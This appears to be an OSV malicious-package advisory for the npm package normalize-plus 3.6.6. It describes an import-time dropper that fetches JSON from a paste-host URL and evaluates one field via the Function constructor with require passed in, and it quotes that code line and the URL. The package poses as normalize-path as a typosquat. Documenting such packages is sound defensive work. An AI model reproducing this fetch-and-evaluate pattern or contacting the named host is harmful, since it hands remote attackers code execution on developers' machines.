normalize-plus @3.6.6

Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 5:41 AM UTC

Malicious

OSV ID: MAL-2026-6399

Ecosystem: npm

Summary

On import, normalize-plus's top-level initPlugin() performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates its cookie field through the Function constructor: const handler = new (Function.constructor)('require', JSON.parse(b).cookie); if (handler) handler(require); (index.js line 74; URL default at line 65). The require symbol is then passed into the dynamically constructed function, granting the remote payload full Node.js module-loading and filesystem privileges in any consumer that requires this package. Because jsonkeeper.com is a mutable anonymous paste host, the maintainer can swap the executed code at any time without republishing the package, so the published tarball alone does not reveal what will run. The package additionally mimics the API of the widely used normalize-path package (exporting a normalizePath function) and self-describes as 'Stylus porting of normalize.css', combining a typosquat lure with an import-time remote-code-execution dropper.

Source: amazon-inspector (a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675)
